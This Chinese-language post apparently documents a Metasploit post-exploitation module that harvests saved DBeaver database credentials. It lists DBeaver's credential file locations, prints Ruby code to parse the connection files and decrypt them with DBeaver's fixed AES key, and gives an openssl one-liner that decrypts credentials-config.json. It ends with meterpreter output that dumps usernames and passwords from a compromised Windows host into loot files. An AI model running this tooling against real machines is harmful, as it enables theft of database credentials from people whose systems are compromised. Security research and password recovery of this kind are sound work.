前言

凭证存放的路径

系统 路径
Windows C:\Users\FireEye\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\
Linux ~/.local/share/DBeaverData/workspace6/General/.dbeaver
Mac ~/Library/DBeaverData/workspace6/General/.dbeaver/
系统 路径
Windows C:\Users\FireEye\.dbeaver4\General\.dbeaver-data-sources.xml
Linux ~/.dbeaver/General/
Mac ~/.dbeaver/General/
{
	"folders": {},
	"connections": {
		"mysql8-1849e7eaca6-1d233a585c8f4388": {
			"provider": "mysql",
			"driver": "mysql8",
			"name": "db",
			"save-password": true,
			"read-only": false,
			"configuration": {
				"host": "localhost",
				"port": "3306",
				"database": "db",
				"url": "jdbc:mysql://localhost:3306/db",
				"home": "mysql_client",
				"type": "dev",
				"auth-model": "native",
				"handlers": {}
			}
		}
	},
	"connection-types": {
		"dev": {
			"name": "Development",
			"color": "255,255,255",
			"description": "Regular development database",
			"auto-commit": true,
			"confirm-execute": false,
			"confirm-data-change": false,
			"auto-close-transactions": false
		}
	}
}

版本配置合并

Untitled

数据提取

XML 文件的解析

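# Extracts saved connections from a legacy DBeaver `.dbeaver-data-sources.xml`
# document.
#
# Every `connection` element matched by the XPath is stored under the `id`
# attribute of its parent element, together with the parent's `provider` and
# `name` and the connection's own host/port/database/url/user attributes.
#
# @param data [String] raw XML text of the data-sources file
# @return [Hash{String=>Hash}] data-source id => connection details; empty
#   when the text is not well-formed XML or has no root element
def parse_xml(data)
  result_hashmap = {}
  begin
    mxml = REXML::Document.new(data).root
  rescue REXML::ParseException
    # A truncated or corrupt file yields no entries instead of aborting the
    # run, the same way parse_data_sources treats unparseable JSON.
    return result_hashmap
  end
  # An empty file parses to a document without a root element.
  return result_hashmap unless mxml

  mxml.elements.to_a('//data-sources//data-source//connection//').each do |node|
    # The XPath ends in `//`; the name check keeps only <connection> nodes.
    next unless node.name == 'connection'

    source = node.parent
    result_hashmap[source.attributes['id']] = {
      'provider' => source.attributes['provider'],
      'name' => source.attributes['name'],
      'host' => node.attributes['host'],
      'port' => node.attributes['port'],
      'database' => node.attributes['database'],
      'url' => node.attributes['url'],
      'user' => node.attributes['user'],
      # NOTE(review): decrypt_dbeaver_6_1_3 is defined outside this block;
      # confirm it tolerates a connection without a password attribute (nil).
      'password' => decrypt_dbeaver_6_1_3(node.attributes['password'])
    }
  end
  # This line writes the decrypted passwords to the console in clear text, so
  # console logs and scrollback are as sensitive as the stored results.
  print_good("#{result_hashmap}")
  result_hashmap
end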
[+] {"mysql8-184d21e1de1-62edc23b6c8c8636"=>{"provider"=>"mysql", "name"=>"Test_MYSQL", "host"=>"localhost", "port"=>"3306", "database"=>"db", "url"=>"jdbc:mysql://localhost:3306/db", "user"=>"root", "password"=>"test_password"}, "postgres-jdbc-184d221fd09-20a857415882add4"=>{"provider"=>"postgresql", "name"=>"Test_PostgreSQL", "host"=>"localhost", "port"=>"5432", "database"=>"postgres", "url"=>"jdbc:postgresql://localhost:5432/postgres", "user"=>"postgres", "password"=>"test_passwordr"}}

JSON 文件的解析

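# Merges DBeaver's `data-sources.json` with the already-decrypted credentials
# map into one record per connection.
#
# A connection that has no matching credentials entry (or no `configuration`
# object) is still reported, with the missing fields set to nil, so one
# incomplete entry does not abort the whole listing.
#
# @param data [String] raw JSON text of `data-sources.json`
# @param credentials [Hash, nil] parsed credentials keyed by data-source id;
#   each value is expected to hold a `#connection` hash with `user` and
#   `password`
# @return [Hash{String=>Hash}] data-source id => connection details; empty
#   when the JSON cannot be parsed or has no `connections` object
def parse_data_sources(data, credentials)
  result_hashmap = {}
  begin
    data_sources = JSON.parse(data)
  rescue ::JSON::ParserError, TypeError
    # TypeError covers a nil or non-String `data`.
    return result_hashmap
  end

  # Anything that is not a JSON object is treated as "no data" so lookups
  # below never run against nil, an Array or a String.
  as_hash = ->(value) { value.is_a?(Hash) ? value : {} }
  saved = as_hash.call(credentials)

  as_hash.call(as_hash.call(data_sources)['connections']).each do |data_source_id, item|
    next unless item.is_a?(Hash)

    config = as_hash.call(item['configuration'])
    # Connections saved without a password have no entry in the credentials map.
    secret = as_hash.call(as_hash.call(saved[data_source_id])['#connection'])
    result_hashmap[data_source_id] = {
      'name' => item['name'],
      'provider' => item['provider'],
      'host' => config['host'],
      'port' => config['port'],
      'user' => secret['user'],
      'password' => secret['password'],
      'database' => config['database'],
      'url' => config['url'],
      'type' => config['type']
    }
  end
  result_hashmap
end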

解密算法

Untitled

➜  ~ openssl aes-128-cbc -d -K babb4a9f774ab853c96c2d653dfe544a -iv 00000000000000000000000000000000 -in "${HOME}/Library/DBeaverData/workspace6/General/.dbeaver/credentials-config.json" | dd bs=1 skip=16 2>/dev/null
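# Fixed AES-128 key used for `credentials-config.json`, the same value passed
# as `-K` to the openssl command shown above. Because the key is a constant,
# the file's confidentiality rests entirely on who can read it: treat it as
# plaintext-equivalent when setting file permissions and handling backups.
# Packed from hex so the constant is exactly 16 raw bytes.
AES_KEY = ['babb4a9f774ab853c96c2d653dfe544a'].pack('H*').freeze

# Decrypts the contents of DBeaver's `credentials-config.json`.
#
# Decryption uses an all-zero IV, so the first 16-byte block comes out as
# garbage and is dropped (the `dd bs=1 skip=16` step of the openssl command).
# NOTE(review): presumably that leading block is the per-file IV; confirm
# against DBeaver's encryptor.
#
# @param data [String] raw bytes of the encrypted file
# @return [String] the decrypted JSON text starting at its first `{"`, or an
#   empty string when the input is too short, fails to decrypt, or holds no
#   JSON object
def decrypt_dbeaver_credentials(data)
  block_size = 16
  return '' if data.nil? || data.bytesize <= block_size

  aes = OpenSSL::Cipher.new('AES-128-CBC')
  begin
    aes.decrypt
    aes.key = AES_KEY
    # Set explicitly instead of relying on the cipher's unset-IV default.
    aes.iv = "\x00" * block_size
    plaintext = aes.update(data) + aes.final
  rescue OpenSSL::Cipher::CipherError => e
    puts "Unable to decode: \"#{data}\" Exception: #{e}"
    return ''
  end

  # Skip the garbage first block before looking for the JSON start, so a
  # stray `{"` inside it cannot be mistaken for the payload.
  payload = plaintext.byteslice(block_size..) || ''
  start = payload.index('{"')
  start ? payload[start..] : ''
end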

Untitled

效果

meterpreter > run post/windows/gather/credentials/dbeaver

[*] Gather Dbeaver Passwords on FireEye
[+] dbeaver .dbeaver-data-sources.xml saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_319751.txt
[*] Finished processing C:\\Users\\FireEye\\.dbeaver4\\General\\.dbeaver-data-sources.xml
[+] dbeaver credentials-config.json saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_334807.txt
[+] dbeaver data-sources.json saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_309767.txt
[*] Finished processing C:\\Users\\FireEye\\AppData\\Roaming\\DBeaverData\\workspace6\\General\\.dbeaver
[+] Passwords stored in: /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_host.dbeaver_421133.txt
[+] Dbeaver Password
================

Name             Protocol    Hostname   Port  Username  Password        DB        URI                                        Type
----             --------    --------   ----  --------  --------        --        ---                                        ----
Test_MYSQL       mysql       localhost  3306  root      test_password   db        jdbc:mysql://localhost:3306/db             dev
Test_PostgreSQL  postgresql  localhost  5432  postgres  test_passwordr  postgres  jdbc:postgresql://localhost:5432/postgres  dev
localhost        mysql       localhost  3306  root      test_mysql      db        jdbc:mysql://localhost:3306/db             test
postgres         postgresql  localhost  5432  postgres  test_postgres   postgres  jdbc:postgresql://localhost:5432/postgres  prod

meterpreter >

参考

https://github.com/rapid7/metasploit-framework/pull/17337

https://github.com/dbeaver/dbeaver/wiki/Admin-Manage-Connections

https://stackoverflow.com/questions/39928401/recover-db-password-stored-in-my-dbeaver-connection
